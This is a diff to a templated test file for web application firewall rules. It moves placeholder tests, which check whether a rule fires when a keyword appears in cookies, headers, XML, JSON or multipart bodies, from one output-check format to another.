dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + 
Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - 
Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML element includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - 
port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" + output: + no_log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML attribute name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: 
"skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" + output: + no_log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: 
"skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: 
"skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 12 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: 
"POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 13 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: 
skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - 
method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - 
input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" 
+ Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log: + expect_ids: [skeletonid]